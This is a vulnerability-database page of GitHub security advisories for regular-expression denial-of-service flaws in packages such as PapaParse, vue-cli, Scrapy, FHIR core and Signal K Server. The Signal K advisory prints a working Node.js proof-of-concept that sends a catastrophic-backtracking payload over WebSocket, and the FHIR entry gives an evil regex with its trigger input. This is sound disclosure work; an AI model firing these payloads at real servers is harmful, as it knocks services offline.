Common Weakness Enumeration

CWE-1333

Allowed

Inefficient Regular Expression Complexity

Abstraction: Base · Status: Draft

The product uses a regular expression with a worst-case computational complexity that is inefficient and possibly exponential.

725 vulnerabilities reference this CWE, most recent first.

GHSA-798H-G4J5-5537

Vulnerability from github – Published: 2023-01-11 15:30 – Updated: 2025-06-16 14:03
VLAI
Summary
Duplicate Advisory: PapaParse Inefficient Regular Expression Complexity vulnerability
Details

Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-qvjc-g5vr-mfgr. This link is maintained to preserve external references.

Original Description

A vulnerability was found in mholt PapaParse up to 5.1.x. It has been classified as problematic. Affected is an unknown function of the file papaparse.js. The manipulation leads to inefficient regular expression complexity. Upgrading to version 5.2.0 is able to address this issue. The name of the patch is 235a12758cd77266d2e98fd715f53536b34ad621. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-218004.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "papaparse"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.2.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-01-12T20:51:49Z",
    "nvd_published_at": "2023-01-11T15:15:00Z",
    "severity": "HIGH"
  },
  "details": "## Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-qvjc-g5vr-mfgr. This link is maintained to preserve external references.\n\n## Original Description\nA vulnerability was found in mholt PapaParse up to 5.1.x. It has been classified as problematic. Affected is an unknown function of the file papaparse.js. The manipulation leads to inefficient regular expression complexity. Upgrading to version 5.2.0 is able to address this issue. The name of the patch is 235a12758cd77266d2e98fd715f53536b34ad621. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-218004.",
  "id": "GHSA-798h-g4j5-5537",
  "modified": "2025-06-16T14:03:06Z",
  "published": "2023-01-11T15:30:28Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-36649"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mholt/PapaParse/issues/777"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mholt/PapaParse/pull/779"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mholt/PapaParse/commit/235a12758cd77266d2e98fd715f53536b34ad621"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/mholt/PapaParse"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mholt/PapaParse/releases/tag/5.2.0"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.218004"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.218004"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Duplicate Advisory: PapaParse Inefficient Regular Expression Complexity vulnerability",
  "withdrawn": "2025-06-16T14:03:06Z"
}

GHSA-79VF-HF9F-J9Q8

Vulnerability from github – Published: 2025-06-09 21:30 – Updated: 2025-06-09 23:10
VLAI
Summary
@vue/cli-plugin-pwa Regular Expression Denial of Service vulnerability
Details

A vulnerability was found in vuejs vue-cli up to 5.0.8. It has been rated as problematic. This issue affects the function HtmlPwaPlugin of the file packages/@vue/cli-plugin-pwa/lib/HtmlPwaPlugin.js of the component Markdown Code Handler. The manipulation leads to inefficient regular expression complexity. The attack may be initiated remotely.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@vue/cli-plugin-pwa"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "5.0.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-5897"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333",
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-06-09T23:10:40Z",
    "nvd_published_at": "2025-06-09T21:15:47Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability was found in vuejs vue-cli up to 5.0.8. It has been rated as problematic. This issue affects the function HtmlPwaPlugin of the file packages/@vue/cli-plugin-pwa/lib/HtmlPwaPlugin.js of the component Markdown Code Handler. The manipulation leads to inefficient regular expression complexity. The attack may be initiated remotely.",
  "id": "GHSA-79vf-hf9f-j9q8",
  "modified": "2025-06-09T23:10:40Z",
  "published": "2025-06-09T21:30:52Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5897"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vuejs/vue-cli/pull/7478"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/vuejs/vue-cli"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.311669"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.311669"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?submit.585798"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "@vue/cli-plugin-pwa Regular Expression Denial of Service vulnerability"
}

GHSA-79WJ-68R3-H5HV

Vulnerability from github – Published: 2025-08-18 15:30 – Updated: 2025-08-18 15:30
VLAI
Details

IBM Concert Software 1.0.0 through 1.1.0 could allow a remote attacker to cause a denial of service using a specially crafted regular expression that would cause excessive resource consumption.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-33090"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-08-18T14:15:28Z",
    "severity": "HIGH"
  },
  "details": "IBM Concert Software 1.0.0 through 1.1.0 could allow a remote attacker to cause a denial of service using a specially crafted regular expression that would cause excessive resource consumption.",
  "id": "GHSA-79wj-68r3-h5hv",
  "modified": "2025-08-18T15:30:32Z",
  "published": "2025-08-18T15:30:32Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33090"
    },
    {
      "type": "WEB",
      "url": "https://www.ibm.com/support/pages/node/7242354"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-7C9G-VJ9M-8PM6

Vulnerability from github – Published: 2024-02-28 00:31 – Updated: 2024-04-16 16:10
VLAI
Summary
Duplicate Advisory: ReDos vulnerability of XMLFeedSpider
Details

Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-cc65-xxvf-f7r9. This link is maintained to preserve external references.

Original Description

Parts of the Scrapy API were found to be vulnerable to a ReDoS attack. Handling a malicious response could cause extreme CPU and memory usage during the parsing of its content, due to the use of vulnerable regular expressions for that parsing.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "scrapy"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2"
            },
            {
              "fixed": "2.11.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "scrapy"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.8.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-04-16T16:10:38Z",
    "nvd_published_at": "2024-02-28T00:15:53Z",
    "severity": "HIGH"
  },
  "details": "## Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-cc65-xxvf-f7r9. This link is maintained to preserve external references.\n\n## Original Description\nParts of the Scrapy API were found to be vulnerable to a ReDoS attack. Handling a malicious response could cause extreme CPU and memory usage during the parsing of its content, due to the use of vulnerable regular expressions for that parsing.",
  "id": "GHSA-7c9g-vj9m-8pm6",
  "modified": "2024-04-16T16:10:38Z",
  "published": "2024-02-28T00:31:55Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1892"
    },
    {
      "type": "WEB",
      "url": "https://github.com/scrapy/scrapy/commit/479619b340f197a8f24c5db45bc068fb8755f2c5"
    },
    {
      "type": "WEB",
      "url": "https://huntr.com/bounties/271f94f2-1e05-4616-ac43-41752389e26b"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Duplicate Advisory: ReDos vulnerability of XMLFeedSpider",
  "withdrawn": "2024-04-16T16:10:38Z"
}

GHSA-7CMJ-V6X8-FRVV

Vulnerability from github – Published: 2026-07-09 13:43 – Updated: 2026-07-09 13:43
VLAI
Summary
org.hl7.fhir.core: ReDoS via FHIRPath matches()/replaceMatches() in FHIR Validator HTTP Endpoint
Details

Summary

All implementations of FHIRPathEngine accept arbitrary FHIRPath expressions and evaluate them without input validation. The utility intended to secure this evaluation did so incorrectly, and did not fully cover all places in which evaluation was being done. An attacker can send a resource containing an evil regex pattern that causes catastrophic backtracking, exhausting system resources, and causing Denial-of-Service.

Details

The vulnerability exists in regex execution in FHIRPathEngine implementations across multiple code modules. The FHIRPath functions matches(), matchesFull(), and replaceMatches() pass user-controlled regular expressions to Java's Pattern.compile() and String.replaceAll() through a utility class designed to time out after a specified interval. That utility correctly cancelled a single executor thread and returned with an exception, but the execution within the thread had no means to listen for this cancellation and would persist. Furthermore, three modules contained method calls in FHIRPathEngine that were not protected by this utility class.

Why this is exploitable:

Java's Pattern.compile() with a pattern like (a+)+$ against input "aaaaaaaaaaaaaaaaaaaaaa!" causes exponential backtracking (O(2^n) time complexity).

Impact

CPU Exhaustion: The exponential backtracking in Java's regex engine consumes 100% of a CPU core for the duration of the hang (effectively infinite for sufficiently long input strings) for callers of FHIRPathEngine.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "ca.uhn.hapi.fhir:org.hl7.fhir.dstu2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "6.9.5"
            },
            {
              "fixed": "6.9.9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "ca.uhn.hapi.fhir:org.hl7.fhir.dstu2016may"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "6.9.5"
            },
            {
              "fixed": "6.9.9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "ca.uhn.hapi.fhir:org.hl7.fhir.dstu3"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "6.9.5"
            },
            {
              "fixed": "6.9.9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "ca.uhn.hapi.fhir:org.hl7.fhir.r4"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "6.9.5"
            },
            {
              "fixed": "6.9.9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "ca.uhn.hapi.fhir:org.hl7.fhir.r4b"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "6.9.5"
            },
            {
              "fixed": "6.9.9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "ca.uhn.hapi.fhir:org.hl7.fhir.r5"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "6.9.5"
            },
            {
              "fixed": "6.9.9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "ca.uhn.hapi.fhir:org.hl7.fhir.validation"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "6.9.5"
            },
            {
              "fixed": "6.9.9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "ca.uhn.hapi.fhir:org.hl7.fhir.validation.cli"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "6.9.5"
            },
            {
              "fixed": "6.9.9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "ca.uhn.hapi.fhir:org.hl7.fhir.dstu2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "6.9.4.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "ca.uhn.hapi.fhir:org.hl7.fhir.dstu2016may"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "6.9.4.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "ca.uhn.hapi.fhir:org.hl7.fhir.dstu3"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "6.9.4.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "ca.uhn.hapi.fhir:org.hl7.fhir.r4"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "6.9.4.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "ca.uhn.hapi.fhir:org.hl7.fhir.r4b"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "6.9.4.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "ca.uhn.hapi.fhir:org.hl7.fhir.r5"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "6.9.4.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "ca.uhn.hapi.fhir:org.hl7.fhir.validation"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "6.9.4.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "ca.uhn.hapi.fhir:org.hl7.fhir.validation.cli"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "6.9.4.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-49485"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333",
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-07-09T13:43:03Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "# Summary\nAll implementations of FHIRPathEngine accept arbitrary FHIRPath expressions and evaluate them without input validation. The utility intended to secure this evaluation did so incorrectly, and did not fully cover all places in which evaluation was being done. An attacker can send a resource containing an evil regex pattern that causes catastrophic backtracking, exhausting system resources, and causing Denial-of-Service.\n\n## Details\nThe vulnerability exists in regex execution in FHIRPathEngine implementations across multiple code modules. The FHIRPath functions matches(), matchesFull(), and replaceMatches() pass user-controlled regular expressions to Java\u0027s Pattern.compile() and String.replaceAll() through a utility class designed to time out after a specified interval. That utility correctly cancelled a single executor thread and returned with an exception, but the execution within the thread had no means to listen for this cancellation and would persist. Furthermore, three modules contained method calls in FHIRPathEngine that were not protected by this utility class.\n\n## Why this is exploitable:\n\nJava\u0027s Pattern.compile() with a pattern like (a+)+$ against input \"aaaaaaaaaaaaaaaaaaaaaa!\" causes exponential backtracking (O(2^n) time complexity). \n\n## Impact\nCPU Exhaustion: The exponential backtracking in Java\u0027s regex engine consumes 100% of a CPU core for the duration of the hang (effectively infinite for sufficiently long input strings) for callers of FHIRPathEngine.",
  "id": "GHSA-7cmj-v6x8-frvv",
  "modified": "2026-07-09T13:43:03Z",
  "published": "2026-07-09T13:43:03Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/hapifhir/org.hl7.fhir.core/security/advisories/GHSA-7cmj-v6x8-frvv"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/hapifhir/org.hl7.fhir.core"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "org.hl7.fhir.core: ReDoS via FHIRPath matches()/replaceMatches() in FHIR Validator HTTP Endpoint"
}

GHSA-7F3X-2WCX-HWW8

Vulnerability from github – Published: 2022-09-16 00:00 – Updated: 2023-09-07 18:49
VLAI
Summary
steal vulnerable to Regular Expression Denial of Service via input variable
Details

A Regular Expression Denial of Service (ReDoS) flaw was found in stealjs steal via the input variable in main.js.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "steal"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "2.3.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-37260"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-09-21T21:07:36Z",
    "nvd_published_at": "2022-09-15T19:15:00Z",
    "severity": "HIGH"
  },
  "details": "A Regular Expression Denial of Service (ReDoS) flaw was found in stealjs steal via the input variable in main.js.",
  "id": "GHSA-7f3x-2wcx-hww8",
  "modified": "2023-09-07T18:49:54Z",
  "published": "2022-09-16T00:00:31Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-37260"
    },
    {
      "type": "WEB",
      "url": "https://github.com/stealjs/steal/issues/1529"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/stealjs/steal"
    },
    {
      "type": "WEB",
      "url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/main.js#L2490"
    },
    {
      "type": "WEB",
      "url": "https://github.com/stealjs/steal/blob/c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9/main.js#L3344"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "steal vulnerable to Regular Expression Denial of Service via input variable"
}

GHSA-7GCJ-PHFF-2884

Vulnerability from github – Published: 2026-04-21 17:17 – Updated: 2026-04-21 17:17
VLAI
Summary
Signal K Server has an Unauthenticated Regular Expression Denial of Service (ReDoS) via WebSocket Subscription Paths
Details

Summary

The SignalK server is vulnerable to an unauthenticated Regular Expression Denial of Service (ReDoS) attack within its WebSocket subscription handling logic. By injecting unescaped regex metacharacters into the context parameter of a stream subscription, an attacker can force the server's Node.js event loop into a catastrophic backtracking loop when evaluating long string identifiers (like the server's self UUID). This results in a total Denial of Service (DoS) where the server CPU spikes to 100% and becomes completely unresponsive to further API or socket requests.

Description

The vulnerability stems from flawed string-to-regex conversion in signalk-server/src/subscriptionmanager.ts. The contextMatcher() and pathMatcher() functions convert wildcard strings (e.g., *) into regular expressions to match incoming data against client subscriptions.

While the code attempts to escape . and * characters, it fails to escape other dangerous regular expression metacharacters—such as +, (, ), ?, [, and ]. Because of this, an attacker can submit a crafted context that contains nested quantifiers (e.g., ([a-z0-9:-]+)+!). When the server attempts to test this malicious regex against legitimate, lengthy data identifiers (like vessels.urn:mrn:signalk:uuid:d384dc156010), the regex engine fails to find a match at the end of the string but initiates billions of catastrophic backtracking operations trying to resolve the nested combinations. Since Node.js runs on a single-threaded event loop, this locks up the thread indefinitely.

Affected Code Blocks & Files

File: signalk-server/src/subscriptionmanager.ts

Affected lines for Context subscriptions (282-300):

function contextMatcher(...) {
  if (subscribeCommand.context) {
    if (isString(subscribeCommand.context)) {
      const pattern = subscribeCommand.context
        .replace(/\./g, '\\.')
        .replace(/\*/g, '.*')
      const matcher = new RegExp('^' + pattern + '$') // VULNERABILITY: User input compiled into regex directly
      return (normalizedDeltaData: WithContext) =>
        matcher.test(normalizedDeltaData.context) ||

Affected lines for Path subscriptions (276-280):

function pathMatcher(path: string = '*') {
  const pattern = path.replace(/\./g, '\\.').replace(/\*/g, '.*')
  const matcher = new RegExp('^' + pattern + '$') // VULNERABILITY: Same issue here
  return (aPath: string) => matcher.test(aPath)
}

Proof of Concept (PoC) Steps

const WebSocket = require('ws');
const http = require('http');

const HOST = 'localhost';
const PORT = 3000;
const WS_URL = `ws://${HOST}:${PORT}/signalk/v1/stream?subscribe=none`;
// Use the API endpoint to measure real server processing lag (requires JSON serialization)
const HTTP_URL = `http://${HOST}:${PORT}/signalk/v1/api/`;

console.log(`[+] Target Server API: ${HTTP_URL}`);
console.log(`[+] Target WebSocket: ${WS_URL}`);

let requestCount = 0;

// Polling function to check server responsiveness and compute delay
function checkServerStatus() {
    const startTime = Date.now();
    requestCount++;
    const reqId = requestCount;

    const req = http.get(HTTP_URL, (res) => {
        let size = 0;
        res.on('data', chunk => { size += chunk.length; });
        res.on('end', () => {
             const latency = Date.now() - startTime;
             console.log(`[HTTP #${reqId}] API responded in ${latency}ms (Data size: ${size} bytes)`);
        });
    });

    req.on('error', (err) => {
        console.log(`[HTTP #${reqId} ERROR] Connection refused/dropped.`);
    });

    // Timeout if the event loop is blocked
    req.setTimeout(2000, () => {
        console.log(`[HTTP #${reqId} TIMEOUT] Server is completely blocked! Node event loop is frozen.`);
        req.destroy();
    });
}

// Start polling every 1 second
console.log('[+] Starting baseline HTTP polling...');
const pollInterval = setInterval(checkServerStatus, 1000);

// Wait a few seconds to establish a baseline, then launch the ReDoS
setTimeout(() => {
    console.log(`\n[!] Initiating WebSocket connection to launch ReDoS attack...`);
    const ws = new WebSocket(WS_URL);

    ws.on('open', () => {
        console.log('[+] WebSocket Connected! Sending catastrophic ReDoS payload...');

        // This regex exploits the unescaped Regex metacharacters in context matcher.
        // It forms: `^vessels\.([a-z0-9:-]+)+!$`
        // When evaluated against `vessels.urn:mrn:signalk:uuid:xxx` (38+ characters), 
        // the nested quantifier `([a-z0-9:-]+)+` will result in 2^38 evaluations 
        // because it fails to find the '!' at the end. This reliably freezes V8.
        const pocPayload = {
            context: "vessels.([a-z0-9:-]+)+!",
            announceNewPaths: true,
            subscribe: [{ path: "*" }]
        };

        ws.send(JSON.stringify(pocPayload));
        console.log('[!] Payload sent. The server should instantly freeze. Watch the HTTP pollers now...\n');
    });

    ws.on('error', (err) => {
        console.error(`[-] WebSocket Error: ${err.message}`);
    });

}, 3500);

// Automatically shut down the test after 15 seconds
setTimeout(() => {
    console.log(`\n[+] Test complete. Stopping pollers.`);
    clearInterval(pollInterval);
    process.exit(0);
}, 15000);

Screenshot 2026-03-29 101918

Impact

This vulnerability achieves a complete Denial of Service (DoS) against the SignalK server. A single unauthenticated WebSocket connection can send the catastrophic payload, which permanently locks the main Node.js event loop.

Screenshot 2026-03-29 101820

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "signalk-server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.25.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-39320"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1333",
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-21T17:17:00Z",
    "nvd_published_at": "2026-04-21T01:16:05Z",
    "severity": "HIGH"
  },
  "details": "## Summary\nThe SignalK server is vulnerable to an unauthenticated Regular Expression Denial of Service (ReDoS) attack within its WebSocket subscription handling logic. By injecting unescaped regex metacharacters into the `context` parameter of a stream subscription, an attacker can force the server\u0027s Node.js event loop into a catastrophic backtracking loop when evaluating long string identifiers (like the server\u0027s self UUID). This results in a total Denial of Service (DoS) where the server CPU spikes to 100% and becomes completely unresponsive to further API or socket requests.\n\n## Description\nThe vulnerability stems from flawed string-to-regex conversion in `signalk-server/src/subscriptionmanager.ts`. The `contextMatcher()` and `pathMatcher()` functions convert wildcard strings (e.g., `*`) into regular expressions to match incoming data against client subscriptions.\n\nWhile the code attempts to escape `.` and `*` characters, it fails to escape other dangerous regular expression metacharacters\u2014such as `+`, `(`, `)`, `?`, `[`, and `]`. Because of this, an attacker can submit a crafted `context` that contains nested quantifiers (e.g., `([a-z0-9:-]+)+!`). When the server attempts to test this malicious regex against legitimate, lengthy data identifiers (like `vessels.urn:mrn:signalk:uuid:d384dc156010`), the regex engine fails to find a match at the end of the string but initiates billions of catastrophic backtracking operations trying to resolve the nested combinations. Since Node.js runs on a single-threaded event loop, this locks up the thread indefinitely.\n\n## Affected Code Blocks \u0026 Files\n**File:** `signalk-server/src/subscriptionmanager.ts`\n\n**Affected lines for Context subscriptions (282-300):**\n```typescript\nfunction contextMatcher(...) {\n  if (subscribeCommand.context) {\n    if (isString(subscribeCommand.context)) {\n      const pattern = subscribeCommand.context\n        .replace(/\\./g, \u0027\\\\.\u0027)\n        .replace(/\\*/g, \u0027.*\u0027)\n      const matcher = new RegExp(\u0027^\u0027 + pattern + \u0027$\u0027) // VULNERABILITY: User input compiled into regex directly\n      return (normalizedDeltaData: WithContext) =\u003e\n        matcher.test(normalizedDeltaData.context) ||\n```\n\n**Affected lines for Path subscriptions (276-280):**\n```typescript\nfunction pathMatcher(path: string = \u0027*\u0027) {\n  const pattern = path.replace(/\\./g, \u0027\\\\.\u0027).replace(/\\*/g, \u0027.*\u0027)\n  const matcher = new RegExp(\u0027^\u0027 + pattern + \u0027$\u0027) // VULNERABILITY: Same issue here\n  return (aPath: string) =\u003e matcher.test(aPath)\n}\n```\n\n## Proof of Concept (PoC) Steps\n\n```\nconst WebSocket = require(\u0027ws\u0027);\nconst http = require(\u0027http\u0027);\n\nconst HOST = \u0027localhost\u0027;\nconst PORT = 3000;\nconst WS_URL = `ws://${HOST}:${PORT}/signalk/v1/stream?subscribe=none`;\n// Use the API endpoint to measure real server processing lag (requires JSON serialization)\nconst HTTP_URL = `http://${HOST}:${PORT}/signalk/v1/api/`;\n\nconsole.log(`[+] Target Server API: ${HTTP_URL}`);\nconsole.log(`[+] Target WebSocket: ${WS_URL}`);\n\nlet requestCount = 0;\n\n// Polling function to check server responsiveness and compute delay\nfunction checkServerStatus() {\n    const startTime = Date.now();\n    requestCount++;\n    const reqId = requestCount;\n    \n    const req = http.get(HTTP_URL, (res) =\u003e {\n        let size = 0;\n        res.on(\u0027data\u0027, chunk =\u003e { size += chunk.length; });\n        res.on(\u0027end\u0027, () =\u003e {\n             const latency = Date.now() - startTime;\n             console.log(`[HTTP #${reqId}] API responded in ${latency}ms (Data size: ${size} bytes)`);\n        });\n    });\n\n    req.on(\u0027error\u0027, (err) =\u003e {\n        console.log(`[HTTP #${reqId} ERROR] Connection refused/dropped.`);\n    });\n\n    // Timeout if the event loop is blocked\n    req.setTimeout(2000, () =\u003e {\n        console.log(`[HTTP #${reqId} TIMEOUT] Server is completely blocked! Node event loop is frozen.`);\n        req.destroy();\n    });\n}\n\n// Start polling every 1 second\nconsole.log(\u0027[+] Starting baseline HTTP polling...\u0027);\nconst pollInterval = setInterval(checkServerStatus, 1000);\n\n// Wait a few seconds to establish a baseline, then launch the ReDoS\nsetTimeout(() =\u003e {\n    console.log(`\\n[!] Initiating WebSocket connection to launch ReDoS attack...`);\n    const ws = new WebSocket(WS_URL);\n\n    ws.on(\u0027open\u0027, () =\u003e {\n        console.log(\u0027[+] WebSocket Connected! Sending catastrophic ReDoS payload...\u0027);\n        \n        // This regex exploits the unescaped Regex metacharacters in context matcher.\n        // It forms: `^vessels\\.([a-z0-9:-]+)+!$`\n        // When evaluated against `vessels.urn:mrn:signalk:uuid:xxx` (38+ characters), \n        // the nested quantifier `([a-z0-9:-]+)+` will result in 2^38 evaluations \n        // because it fails to find the \u0027!\u0027 at the end. This reliably freezes V8.\n        const pocPayload = {\n            context: \"vessels.([a-z0-9:-]+)+!\",\n            announceNewPaths: true,\n            subscribe: [{ path: \"*\" }]\n        };\n\n        ws.send(JSON.stringify(pocPayload));\n        console.log(\u0027[!] Payload sent. The server should instantly freeze. Watch the HTTP pollers now...\\n\u0027);\n    });\n\n    ws.on(\u0027error\u0027, (err) =\u003e {\n        console.error(`[-] WebSocket Error: ${err.message}`);\n    });\n\n}, 3500);\n\n// Automatically shut down the test after 15 seconds\nsetTimeout(() =\u003e {\n    console.log(`\\n[+] Test complete. Stopping pollers.`);\n    clearInterval(pollInterval);\n    process.exit(0);\n}, 15000);\n```\n\u003cimg width=\"1003\" height=\"524\" alt=\"Screenshot 2026-03-29 101918\" src=\"https://github.com/user-attachments/assets/4b257c4c-f97a-4812-b812-ce2f235b6039\" /\u003e\n\n## Impact\n\nThis vulnerability achieves a complete **Denial of Service (DoS)** against the SignalK server. A single unauthenticated 